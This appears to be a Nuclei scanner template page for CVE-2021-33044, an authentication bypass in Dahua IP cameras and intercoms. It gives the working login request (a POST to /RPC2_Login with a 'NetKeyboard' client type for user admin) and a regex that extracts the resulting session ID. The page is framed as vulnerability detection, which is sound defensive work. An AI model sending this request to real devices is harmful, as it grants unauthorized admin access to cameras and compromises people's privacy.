Dahua IPC/VTH/VTO - Authentication Bypass
ID: CVE-2021-33044
Severity: critical
Author: gy741
Tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev
Description
Section titled “Description”Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
YAML Source
Section titled “YAML Source”id: CVE-2021-33044
info: name: Dahua IPC/VTH/VTO - Authentication Bypass author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. impact: | An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system. remediation: | Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/support/cybersecurity/details/957 - https://github.com/bp2008/DahuaLoginBypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.30359 epss-percentile: 0.96948 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev
http: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}}
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
matchers-condition: and matchers: - type: word part: body words: - '"result":true,"session"' - 'id' - 'params' condition: and
- type: status status: - 200
extractors: - type: regex group: 1 regex: - ',"result":true,"session":"([a-z]+)"\}' part: body# digest: 490a00463044022029ac74155f70e13590ac5c2df4671ee9f8cb328b9daf7c216dd71babef63ae04022061a5bdaa5fa0d7dc894ce0e62fe4e660c3e03ddae1541921b543745b8e1744a3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33044.yaml"